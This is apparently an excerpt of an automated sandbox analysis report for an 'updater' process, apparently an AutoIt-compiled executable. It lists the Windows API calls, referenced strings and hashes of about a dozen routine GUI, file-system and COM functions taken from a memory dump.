DeleteObject.GDI32(00000000), ref: 00BEC05D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 681da673625edac17868447340e1aec8a698093b4f31c14111d818a22f4e1374
Instruction ID: 3f273d2c1db8c6195cb5e1125fd830564a3b61f334f1a20677bfaf1e9b4108fc
Opcode Fuzzy Hash: 681da673625edac17868447340e1aec8a698093b4f31c14111d818a22f4e1374
Instruction Fuzzy Hash: A161BC31114604DFDB359F19CD88B7A7BF1FB40312F208AACE54A5AAA0C7B1A891DF91

Function 00BB2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00BB29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BB29BC

GetSysColor.USER32(0000000F), ref: 00BB25AF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: f0ee51833f61ae42573a32d0ce73e23128c2d4773ec84cc03cc356cd6076414c
Instruction ID: d84878a9c0f5693ac0a753e2b82265ef495ed9f83b7625e10f47cfbfad25818a
Opcode Fuzzy Hash: f0ee51833f61ae42573a32d0ce73e23128c2d4773ec84cc03cc356cd6076414c
Instruction Fuzzy Hash: 5141A535104144AFDB255F28DC88BFD3BA5FB1A331F2942A5FE668A1E5D7708C42DB21

Function 00BC29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BC2A3E,?,00008000), ref: 00BD0BA7

Part of subcall function 00BD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC2A58,?,00008000), ref: 00BD02A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC2ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00BC2C2C

Part of subcall function 00BC3EBE: _wcscpy.LIBCMT ref: 00BC3EF6

Part of subcall function 00BD386D: _iswctype.LIBCMT ref: 00BD3875

Strings

Bad directive syntax error, xrefs: 00C0008F
AU3!, xrefs: 00BC2A93
Error opening the file, xrefs: 00BFFD33, 00BFFDAA
Unterminated string, xrefs: 00C000D6
EA06, xrefs: 00BFFD48
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00BFFD17

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: b8438ee54e7b4f4b0fea0b563a73d210c0f1eb30a80e9eef7a33deef4e2c899d
Instruction ID: 0d3c50172cb93404afb43965d088ae8aa1a5ebe94f59fa6c04e6b6de6385c6b0
Opcode Fuzzy Hash: b8438ee54e7b4f4b0fea0b563a73d210c0f1eb30a80e9eef7a33deef4e2c899d
Instruction Fuzzy Hash: 6F02AF701083419FC724EF24C891EAFBBE5EF99314F10496DF599972A2DB30DA89CB52

Function 00C1AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00C40980), ref: 00C1AF4E
GetDriveTypeW.KERNEL32(00000061,00C6B5F0,00000061), ref: 00C1B018
_wcscpy.LIBCMT ref: 00C1B042

Strings

ramdisk, xrefs: 00C1AFC2
network, xrefs: 00C1AFAC
unknown, xrefs: 00C1AFD9
cdrom, xrefs: 00C1AF6A
fixed, xrefs: 00C1AF96
removable, xrefs: 00C1AF80
all, xrefs: 00C1AF54

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: b80bdbdeb5cb9be45a0f968344bb062bbe31b6d3b96017144e1bf5bad3b7e33b
Instruction ID: d69bb60671d6c75cd54889cc89b2b0d963ed961476c0fb3ac799b1bdfd685f63
Opcode Fuzzy Hash: b80bdbdeb5cb9be45a0f968344bb062bbe31b6d3b96017144e1bf5bad3b7e33b
Instruction Fuzzy Hash: EF519E701183059BC710EF54C891AEEB7E5FF96300F50486EF496972A2EB70DE8ADA53

Function 00BB4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00BB4D62
__swprintf.LIBCMT ref: 00BB4DAC
__i64tow.LIBCMT ref: 00BEDB3B

Strings

%.15g, xrefs: 00BB4DA6
0x%p, xrefs: 00BEDB1D
True, xrefs: 00BEDAFC
False, xrefs: 00BEDB03

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 8d2fd25213c086f7cad286a0e203506434774ba3376e704a9425d73b7787b310
Instruction ID: bb4c27fa7b9f048ad8367deadafd265e870769476e19a55b424571d50393a773
Opcode Fuzzy Hash: 8d2fd25213c086f7cad286a0e203506434774ba3376e704a9425d73b7787b310
Instruction Fuzzy Hash: B8419271604209ABDB24AB78D881E7AB3E8FB45300F2448EEE149D6292EBB1DD419711

Function 00C37777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3778F
CreateMenu.USER32 ref: 00C377AA
SetMenu.USER32(?,00000000), ref: 00C377B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C37846
IsMenu.USER32(?), ref: 00C3785C
CreatePopupMenu.USER32 ref: 00C37866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C37893
DrawMenuBar.USER32 ref: 00C3789B

Strings

0, xrefs: 00C37785
F, xrefs: 00C37887

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 7626fa04047f6ab64322a3d798dffa32433a28d0cdccd564788645db1df26088
Instruction ID: f813cce83ee418d895308fdfcda4d343432c4b5dd64c9219e5ea278bd1392071
Opcode Fuzzy Hash: 7626fa04047f6ab64322a3d798dffa32433a28d0cdccd564788645db1df26088
Instruction Fuzzy Hash: C5415AB8A10209EFDB20DF64D888B9ABBF5FF49310F144129FA55A73A1D730AA10CF51

Function 00C37AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C37B83
CreateCompatibleDC.GDI32(00000000), ref: 00C37B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C37B9D
SelectObject.GDI32(00000000,00000000), ref: 00C37BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C37BB0
DeleteDC.GDI32(00000000), ref: 00C37BB9
GetWindowLongW.USER32(?,000000EC), ref: 00C37BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C37BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C37BE3

Strings

static, xrefs: 00C37B1B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9e34e98743aea02728a67531d235249fefc58ba49a69196ed6066b1239b4c0d3
Instruction ID: f8a46ab0248ce0d70cd7dbabb98775461816b4826d1b8cfc6f754d5c09f83750
Opcode Fuzzy Hash: 9e34e98743aea02728a67531d235249fefc58ba49a69196ed6066b1239b4c0d3
Instruction Fuzzy Hash: 37319876114218ABDF219FA4DC48FDF7B79FF0A324F210314FA65A21A0C7319820DBA0

Function 00BD7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD706B

Part of subcall function 00BD8D58: __getptd_noexit.LIBCMT ref: 00BD8D58

__gmtime64_s.LIBCMT ref: 00BD7104
__gmtime64_s.LIBCMT ref: 00BD713A
__gmtime64_s.LIBCMT ref: 00BD7157
__allrem.LIBCMT ref: 00BD71AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD71C9
__allrem.LIBCMT ref: 00BD71E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD71FE
__allrem.LIBCMT ref: 00BD7215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD7233
__invoke_watson.LIBCMT ref: 00BD72A4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 7412ecfb0d48ee1d090ac34cec2adb998ac83537f97a0bba5de09112e9f991a8
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 01710371A84756ABD7149A79CC82B9AF7E8EF01720F1442ABF514E73C1FB70DA408790

Function 00C12CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12CE9
GetMenuItemInfoW.USER32(00C77890,000000FF,00000000,00000030), ref: 00C12D4A
SetMenuItemInfoW.USER32(00C77890,00000004,00000000,00000030), ref: 00C12D80
Sleep.KERNEL32(000001F4), ref: 00C12D92
GetMenuItemCount.USER32(?), ref: 00C12DD6
GetMenuItemID.USER32(?,00000000), ref: 00C12DF2
GetMenuItemID.USER32(?,-00000001), ref: 00C12E1C
GetMenuItemID.USER32(?,?), ref: 00C12E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C12EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C12EDC

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7109439ec62dda17a09372b8d8fc09594307286d5ac74a5b558c9c036b5ca75d
Instruction ID: f005a44040501e0ddb55585061801ceae6e74fb3ac2c4dc271f0eb68b7600a93
Opcode Fuzzy Hash: 7109439ec62dda17a09372b8d8fc09594307286d5ac74a5b558c9c036b5ca75d
Instruction Fuzzy Hash: CD619F78900249AFDB10DF64DC88AEEBBB8FF02305F144159F851A7251D731AEA5EB21

Function 00C37548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C375CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C375CD
GetWindowLongW.USER32(?,000000F0), ref: 00C375F1
_memset.LIBCMT ref: 00C37602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C37614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C3768C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: eb74120a627566d59339a73fa55528406eb817b22d57a7a562885562b470f446
Instruction ID: 2d6e42b507ec2e2b458bdf1cbf0e2694ea0aadd3957c59c16c9d248e09b8d63c
Opcode Fuzzy Hash: eb74120a627566d59339a73fa55528406eb817b22d57a7a562885562b470f446
Instruction Fuzzy Hash: AB618CB5904208AFDB21DFA4CC85FEE77F8EB09710F144299FA15A72A1D770AE41DB60

Function 00C077B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C077DD
SafeArrayAllocData.OLEAUT32(?), ref: 00C07836
VariantInit.OLEAUT32(?), ref: 00C07848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00C07868
VariantCopy.OLEAUT32(?,?), ref: 00C078BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00C078CF
VariantClear.OLEAUT32(?), ref: 00C078E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00C078F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C078FA
VariantClear.OLEAUT32(?), ref: 00C0790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C07917

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e606ff4d84727b50503c58440a0a433da9e4f37159d4dd7e7f8e3dea858d3a3f
Instruction ID: f5a81cc5dba3231314ff74d81a6dfbf7abae9eacc57914754bfe9e956464e854
Opcode Fuzzy Hash: e606ff4d84727b50503c58440a0a433da9e4f37159d4dd7e7f8e3dea858d3a3f
Instruction Fuzzy Hash: D9415435E001199FCB04DFA4D848AEDBBB9FF48354F108569EA55A72A1C770EA45CFA0

Function 00C28AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

CoInitialize.OLE32 ref: 00C28AED
CoUninitialize.OLE32 ref: 00C28AF8
CoCreateInstance.OLE32(?,00000000,00000017,00C43BBC,?), ref: 00C28B58
IIDFromString.OLE32(?,?), ref: 00C28BCB
VariantInit.OLEAUT32(?), ref: 00C28C65
VariantClear.OLEAUT32(?), ref: 00C28CC6

Strings

Failed to create object, xrefs: 00C28B63, 00C28C19
Invalid parameter, xrefs: 00C28BE4
NULL Pointer assignment, xrefs: 00C28B9D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: ec2928368e84b02cdb777413f7aaa03d9c5d62f471b9b40ef757078d5cd59a76
Instruction ID: 5e25308a2579b486faf4fe8ccdefad5a673f3cc28c6746c079ea6de8a78b034c
Opcode Fuzzy Hash: ec2928368e84b02cdb777413f7aaa03d9c5d62f471b9b40ef757078d5cd59a76
Instruction Fuzzy Hash: 32619C7060A7219FC710DF14D889F6AB7E8BF89714F10085DF9959B691CB70EE48CBA2

Function 00C1BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1BB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C1BB89
GetLastError.KERNEL32 ref: 00C1BB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00C1BC00

Strings

READONLY, xrefs: 00C1BBCB
UNKNOWN, xrefs: 00C1BBB8
READY, xrefs: 00C1BBD9
INVALID, xrefs: 00C1BBD2
NOTREADY, xrefs: 00C1BBBF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 298129edbdffd345ed064c71aeba3bf7f19d0d585c34fa882264a7be08037ef6
Instruction ID: d3d206c7486fb76974b9021adbbf0b9f77f6ef3ad7d7c5ad75335fb2e589d8d2
Opcode Fuzzy Hash: 298129edbdffd345ed064c71aeba3bf7f19d0d585c34fa882264a7be08037ef6
Instruction Fuzzy Hash: 4231B035A042099FCB10DF69C885EEDB7B8FB46300F108169E515D7696DB70AE81DB90

Function 00C09B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C09BCC
GetDlgCtrlID.USER32 ref: 00C09BD7
GetParent.USER32 ref: 00C09BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C09BF6
GetDlgCtrlID.USER32(?), ref: 00C09BFF
GetParent.USER32(?), ref: 00C09C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C09C1E

Strings

ComboBox, xrefs: 00C09B54
ListBox, xrefs: 00C09B89

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 36cce887a398834af13e9942de7a393338db3a59f6cf99b92bd296f1faa4c6ca
Instruction ID: c1daef07a4067a46f41fb20dcb1090d2f1944171c19e5728a37981d9969ea873
Opcode Fuzzy Hash: 36cce887a398834af13e9942de7a393338db3a59f6cf99b92bd296f1faa4c6ca
Instruction Fuzzy Hash: 2F21F175941104ABDF00EBA4CC85FFEBBB4FF96310F100155FA62A72E2DB748915DA20

Function 00C09C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C09CB5
GetDlgCtrlID.USER32 ref: 00C09CC0
GetParent.USER32 ref: 00C09CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C09CDF
GetDlgCtrlID.USER32(?), ref: 00C09CE8
GetParent.USER32(?), ref: 00C09D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C09D07

Strings

ComboBox, xrefs: 00C09C3F
ListBox, xrefs: 00C09C74

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 2b48a595ea02e42f2d0103b557061054421111c6ec79e0c5a8876b42ed435021
Instruction ID: 4d814a9abb338f8e3c0a14d671f7513d4654b6d13ff002019339ebd71f31b055
Opcode Fuzzy Hash: 2b48a595ea02e42f2d0103b557061054421111c6ec79e0c5a8876b42ed435021
Instruction Fuzzy Hash: 2221C175941204BBDF10EBA4CC85FFEBBB9FF95300F100055BD62A71A2DB758915DA20

